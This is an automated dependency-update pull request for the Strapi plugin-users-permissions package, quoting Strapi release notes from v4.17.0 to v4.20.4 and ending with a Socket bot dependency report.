[@​markkaylor](https://togithub.com/markkaylor) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.20.4`](https://togithub.com/strapi/strapi/releases/tag/v4.20.4) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.3...v4.20.4) ##### 💅 Enhancement - \[core:data-transfer] feat(dts): support models and contentTypes [https://github.com/strapi/strapi/pull/19604](https://togithub.com/strapi/strapi/pull/19604)4) [@​markkaylor](https://togithub.com/markkaylor) ##### 🔥 Bug fix - \[core:admin] fix(content-manager): send locale when deleting i18n single type [https://github.com/strapi/strapi/pull/19629](https://togithub.com/strapi/strapi/pull/19629)9) [@​jhoward1994](https://togithub.com/jhoward1994) - \[core:data-transfer] fix: api and transfer token lifespan select lists work with all durations [https://github.com/strapi/strapi/pull/19621](https://togithub.com/strapi/strapi/pull/19621)1) [@​innerdvations](https://togithub.com/innerdvations) ##### ⚙️ Chore - \[dependencies] chore: bump [@​strapi/design-systems](https://togithub.com/strapi/design-systems) from 1.14.1 to 1.15.0 ([https://github.com/strapi/strapi/pull/19630](https://togithub.com/strapi/strapi/pull/19630)) [@​madhurisandbhor](https://togithub.com/madhurisandbhor) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.20.3`](https://togithub.com/strapi/strapi/releases/tag/v4.20.3) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.2...v4.20.3) ##### 🔥 Bug fix - \[core:data-transfer] fix: transfer pull getting stuck/skipping assets step [https://github.com/strapi/strapi/pull/19485](https://togithub.com/strapi/strapi/pull/19485)5) [@​Bassel17](https://togithub.com/Bassel17) - \[core:upload] Add sizeInBytes for upload providers [https://github.com/strapi/strapi/pull/19593](https://togithub.com/strapi/strapi/pull/19593)3) [@​giu1io](https://togithub.com/giu1io) - \[plugin:i18n] fix: do not validate locale if not creating [https://github.com/strapi/strapi/pull/19626](https://togithub.com/strapi/strapi/pull/19626)6) [@​Marc-Roig](https://togithub.com/Marc-Roig) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.20.2`](https://togithub.com/strapi/strapi/releases/tag/v4.20.2) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.1...v4.20.2) ##### 🔥 Bug fix - \[core:content-manager] fix(content-manager): fix strange behaviours when you change position on Dynamic Zones and solve issue with ids not unique [https://github.com/strapi/strapi/pull/19480](https://togithub.com/strapi/strapi/pull/19480)0) [@​simotae14](https://togithub.com/simotae14) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.20.1`](https://togithub.com/strapi/strapi/releases/tag/v4.20.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.20.0...v4.20.1) ##### 💅 Enhancement - \[core:admin] enhancement: allow relative links in the Blocks editor [https://github.com/strapi/strapi/pull/19197](https://togithub.com/strapi/strapi/pull/19197)7) [@​Ben-Zahler](https://togithub.com/Ben-Zahler) ##### 🔥 Bug fix - \[core:content-releases] fix(content-releases): replace Popover with Menu component in the Details page [https://github.com/strapi/strapi/pull/19408](https://togithub.com/strapi/strapi/pull/19408)8) [@​simotae14](https://togithub.com/simotae14) - \[core:content-type-builder] fix: restrict model and attribute names that break Strapi [https://github.com/strapi/strapi/pull/19345](https://togithub.com/strapi/strapi/pull/19345)5) [@​innerdvations](https://togithub.com/innerdvations) - \[core:strapi] Fix input payload validation [https://github.com/strapi/strapi/pull/19467](https://togithub.com/strapi/strapi/pull/19467)7) [@​Convly](https://togithub.com/Convly) - \[plugin:i18n] fix(i18n): extract relatedEntityId from the query [https://github.com/strapi/strapi/pull/19510](https://togithub.com/strapi/strapi/pull/19510)0) [@​jhoward1994](https://togithub.com/jhoward1994) - \[typescript] Fix Type Generation Checks for Min/Max Default Values [https://github.com/strapi/strapi/pull/19490](https://togithub.com/strapi/strapi/pull/19490)0) [@​Convly](https://togithub.com/Convly) ##### ⚙️ Chore - \[core:admin] fix(admin): french translations for null/not null filters [https://github.com/strapi/strapi/pull/19384](https://togithub.com/strapi/strapi/pull/19384)4) [@​t-fritsch](https://togithub.com/t-fritsch) - \[core:content-releases] test(content-releases): add end-to-end tests [https://github.com/strapi/strapi/pull/19407](https://togithub.com/strapi/strapi/pull/19407)7) [@​markkaylor](https://togithub.com/markkaylor) - \[docs] Experiment/readme strapi v5 [https://github.com/strapi/strapi/pull/19503](https://togithub.com/strapi/strapi/pull/19503)3) [@​Mcastres](https://togithub.com/Mcastres) - \[plugin:cloud] Experiment/change label cloud plugin [https://github.com/strapi/strapi/pull/19483](https://togithub.com/strapi/strapi/pull/19483)3) [@​Mcastres](https://togithub.com/Mcastres) ##### 📖 Documentation - \[core:content-releases] docs(content-releases): add frontend docs [https://github.com/strapi/strapi/pull/19391](https://togithub.com/strapi/strapi/pull/19391)1) [@​simotae14](https://togithub.com/simotae14) ##### 🚀 New feature - \[core:content-releases] feat(content-releases): added a purchase content releases page [https://github.com/strapi/strapi/pull/19455](https://togithub.com/strapi/strapi/pull/19455)5) [@​simotae14](https://togithub.com/simotae14) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.20.0`](https://togithub.com/strapi/strapi/releases/tag/v4.20.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.19.1...v4.20.0) ##### 🔥 Bug fix - \[core:admin] fix(users): adjust response management to create user [https://github.com/strapi/strapi/pull/19382](https://togithub.com/strapi/strapi/pull/19382)2) [@​davidpv1](https://togithub.com/davidpv1) - \[core:content-manager] fix(cm): pass params to post requests for publish & unpublish [https://github.com/strapi/strapi/pull/19294](https://togithub.com/strapi/strapi/pull/19294)4) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:content-releases] fix(content-releases): handle release.createdBy is null [https://github.com/strapi/strapi/pull/19376](https://togithub.com/strapi/strapi/pull/19376)6) [@​markkaylor](https://togithub.com/markkaylor) - \[core:content-releases] fix(content-releases): wrong value for the max number of pending releases limit [https://github.com/strapi/strapi/pull/19394](https://togithub.com/strapi/strapi/pull/19394)4) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): standardize icons size [https://github.com/strapi/strapi/pull/19399](https://togithub.com/strapi/strapi/pull/19399)9) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): add disabled state to action radio buttons [https://github.com/strapi/strapi/pull/19420](https://togithub.com/strapi/strapi/pull/19420)0) [@​simotae14](https://togithub.com/simotae14) - \[core:data-transfer] fix(dts): support morphToOne relations [https://github.com/strapi/strapi/pull/19381](https://togithub.com/strapi/strapi/pull/19381)1) [@​markkaylor](https://togithub.com/markkaylor) - \[core:database] fix: nested on commit on rollback transactions [https://github.com/strapi/strapi/pull/19368](https://togithub.com/strapi/strapi/pull/19368)8) [@​Marc-Roig](https://togithub.com/Marc-Roig) ##### 💅 Enhancement - \[core:content-releases] fix(content-releases): Add single type to releases [https://github.com/strapi/strapi/pull/19332](https://togithub.com/strapi/strapi/pull/19332)2) [@​Feranchz](https://togithub.com/Feranchz) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.19.1`](https://togithub.com/strapi/strapi/releases/tag/v4.19.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.19.0...v4.19.1) ##### 🔥 Bug fix - \[core:admin] Fix password is sent when it was not changed [https://github.com/strapi/strapi/pull/19295](https://togithub.com/strapi/strapi/pull/19295)5) [@​xyrolle](https://togithub.com/xyrolle) - \[core:content-manager] Sanitize relation read query [https://github.com/strapi/strapi/pull/19227](https://togithub.com/strapi/strapi/pull/19227)7) [@​Bassel17](https://togithub.com/Bassel17) - \[core:content-type-builder] Check component against collectionTypeNames [https://github.com/strapi/strapi/pull/19328](https://togithub.com/strapi/strapi/pull/19328)8) [@​Bassel17](https://togithub.com/Bassel17) - \[plugin:i18n] fix(i18n): locale swapping with content-types & D\&P disabled[https://github.com/strapi/strapi/pull/19296](https://togithub.com/strapi/strapi/pull/19296)96) [@​joshuaellis](https://togithub.com/joshuaellis) ##### 💅 Enhancement - \[core:content-manager] feat(content-manager): better handle entry duplication [https://github.com/strapi/strapi/pull/19256](https://togithub.com/strapi/strapi/pull/19256)6) [@​remidej](https://togithub.com/remidej) ##### ⚙️ Chore - \[tooling] chore(workflows): update unit_front skipped test to use node 20 [https://github.com/strapi/strapi/pull/19363](https://togithub.com/strapi/strapi/pull/19363)3) [@​Feranchz](https://togithub.com/Feranchz) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.19.0`](https://togithub.com/strapi/strapi/releases/tag/v4.19.0) [Compare Source](https://togithub.com/strapi/strapi/compare/e1ede8c55a0e1e22ce20137bf238fc374bd5dd51...v4.19.0) ##### 🚀 New feature - **Content Releases** :tada: [@​markkaylor](https://togithub.com/markkaylor) [@​Feranchz](https://togithub.com/Feranchz) [@​simotae14](https://togithub.com/simotae14) - \[core:admin] feat: add vite [https://github.com/strapi/strapi/pull/18697](https://togithub.com/strapi/strapi/pull/18697)7) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:strapi] feat(strapi): add experimental plugin:watch:link command to CLI [https://github.com/strapi/strapi/pull/19143](https://togithub.com/strapi/strapi/pull/19143)3) [@​joshuaellis](https://togithub.com/joshuaellis) ##### 💅 Enhancement - \[tooling] ci(perf): update yarn-nm-install action [https://github.com/strapi/strapi/pull/18747](https://togithub.com/strapi/strapi/pull/18747)7) [@​belgattitude](https://togithub.com/belgattitude) ##### ⚙️ Chore - \[core:admin] chore(admin): data-transfer should be dev dep & peer dep loose [https://github.com/strapi/strapi/pull/19192](https://togithub.com/strapi/strapi/pull/19192)2) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:content-type-builder] chore(ctb): remove "new" badge on Blocks attribute [https://github.com/strapi/strapi/pull/19246](https://togithub.com/strapi/strapi/pull/19246)6) [@​remidej](https://togithub.com/remidej) - \[core:data-transfer] chore: improve logging for assets restore error [https://github.com/strapi/strapi/pull/19251](https://togithub.com/strapi/strapi/pull/19251)1) [@​innerdvations](https://togithub.com/innerdvations) - \[generators:app] feat: Automatically Create 'plugins.js/ts' in Config on New Strapi Project Initialization [https://github.com/strapi/strapi/pull/19025](https://togithub.com/strapi/strapi/pull/19025)5) [@​L-Weisz](https://togithub.com/L-Weisz) ##### 🔥 Bug fix - \[core:data-transfer] fix(data-transfer): Skip and warn on orphan links in import and transfer [https://github.com/strapi/strapi/pull/19186](https://togithub.com/strapi/strapi/pull/19186)6) [@​christiancp100](https://togithub.com/christiancp100) - \[typescript] Respect autogenerate setting for JS projects [https://github.com/strapi/strapi/pull/19207](https://togithub.com/strapi/strapi/pull/19207)7) [@​innerdvations](https://togithub.com/innerdvations) - \[typescript] Fix Types Generation for Biginteger Attributes With Default Values [https://github.com/strapi/strapi/pull/19241](https://togithub.com/strapi/strapi/pull/19241)1) [@​Convly](https://togithub.com/Convly) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.18.0`](https://togithub.com/strapi/strapi/compare/v4.17.1...e1ede8c55a0e1e22ce20137bf238fc374bd5dd51) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.17.1...e1ede8c55a0e1e22ce20137bf238fc374bd5dd51) ### [`v4.17.1`](https://togithub.com/strapi/strapi/releases/tag/v4.17.1) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.17.0...v4.17.1) ##### What's Changed - fix(cm): manage when we're creating entries derivatively in the CM by [@​joshuaellis](https://togithub.com/joshuaellis) in [https://github.com/strapi/strapi/pull/19209](https://togithub.com/strapi/strapi/pull/19209) **Full Changelog**: https://github.com/strapi/strapi/compare/v4.17.0...v4.17.1 ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 ### [`v4.17.0`](https://togithub.com/strapi/strapi/releases/tag/v4.17.0) [Compare Source](https://togithub.com/strapi/strapi/compare/v4.16.2...v4.17.0) ##### 🔥 Bug fix - \[core:content-releases] fix(content-releases): fix padding bottom duplicated in the Heading of the Details page [https://github.com/strapi/strapi/pull/19066](https://togithub.com/strapi/strapi/pull/19066)6) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): remove Refresh button from the details page [https://github.com/strapi/strapi/pull/19067](https://togithub.com/strapi/strapi/pull/19067)7) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): redirect to the list page when we have errors in the Details page [https://github.com/strapi/strapi/pull/19078](https://togithub.com/strapi/strapi/pull/19078)8) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): add a bottom border below tabs [https://github.com/strapi/strapi/pull/19090](https://togithub.com/strapi/strapi/pull/19090)0) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): empty Details page add a button to the CM [https://github.com/strapi/strapi/pull/19095](https://togithub.com/strapi/strapi/pull/19095)5) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases): CM add Release add content when there are no releases [https://github.com/strapi/strapi/pull/19096](https://togithub.com/strapi/strapi/pull/19096)6) [@​simotae14](https://togithub.com/simotae14) - \[core:content-releases] fix(content-releases):disable edit and delete buttons in the Details page when you don't have permissions [https://github.com/strapi/strapi/pull/19099](https://togithub.com/strapi/strapi/pull/19099)9) [@​simotae14](https://togithub.com/simotae14) - \[core:helper-plugin] fix(helper-plugin): memoize GenericInput for performance issues [https://github.com/strapi/strapi/pull/19177](https://togithub.com/strapi/strapi/pull/19177)7) [@​joshuaellis](https://togithub.com/joshuaellis) - \[core:strapi] Filter out undefined controllers in startup telemetry checks [https://github.com/strapi/strapi/pull/19144](https://togithub.com/strapi/strapi/pull/19144)4) [@​Convly](https://togithub.com/Convly) - \[plugin:graphql] fix: revert graphql-upload library to non breaking change version [https://github.com/strapi/strapi/pull/19182](https://togithub.com/strapi/strapi/pull/19182)2) [@​Bassel17](https://togithub.com/Bassel17) - \[typescript] \[Types] Fix entity-service's parameters inference for generic mapped types with deep literal intersections[https://github.com/strapi/strapi/pull/19093](https://togithub.com/strapi/strapi/pull/19093)93) [@​Convly](https://togithub.com/Convly) ##### 🚀 New feature - \[core:content-releases] feat(content-releases): delete release action on release page [https://github.com/strapi/strapi/pull/19089](https://togithub.com/strapi/strapi/pull/19089)9) [@​markkaylor](https://togithub.com/markkaylor) - \[core:content-releases] feat(content-releases): group release actions by property [https://github.com/strapi/strapi/pull/19097](https://togithub.com/strapi/strapi/pull/19097)7) [@​markkaylor](https://togithub.com/markkaylor) ##### ⚙️ Chore - \[dependencies] chore: update ds 1.14.1 [https://github.com/strapi/strapi/pull/19179](https://togithub.com/strapi/strapi/pull/19179)9) [@​joshuaellis](https://togithub.com/joshuaellis) ##### 📚 Update and Migration Guides - General update guide can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/update-version.html) - Migration guides can be found [here](https://docs.strapi.io/developer-docs/latest/update-migration-guides/migration-guides.html) 📚 *** ##### What's Changed > Due to typescript migrations not every PR had a milestone, this it the complete list of PRs from 4.16.2 -> 4.17.0 - chore(plugins/i18n): migrate to basic ts by [@​alexandrebodin](https://togithub.com/alexandrebodin) in [https://github.com/strapi/strapi/pull/18735](https://togithub.com/strapi/strapi/pull/18735) - Convert CM to TS by [@​jhoward1994](https://togithub.com/jhoward1994) in [https://github.com/strapi/strapi/pull/18669](https://togithub.com/strapi/strapi/pull/18669) - chore(blocks): refactor useBlocksStore by [@​remidej](https://togithub.com/remidej) in [https://github.com/strapi/strapi/pull/18776](https://togithub.com/strapi/strapi/pull/18776) - chore(actions): run checks workflow on develop branches by [@​joshuaellis](https://togithub.com/joshuaellis) in [https://github.com/strapi/strapi/pull/18815](https://togithub.com/strapi/strapi/pull/

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by Mend Renovate. View repository job log here.

[socket-security[bot]]

New and removed dependencies detected. Learn more about Socket for GitHub ↗︎

Package	New capabilities	Transitives	Size	Publisher
npm/@strapi/plugin-users-permissions@4.24.2	Transitive: environment, eval, network	+70	16 MB	marc-roig-strapi

🚮 Removed packages: npm/@strapi/plugin-users-permissions@4.15.5

View full report↗︎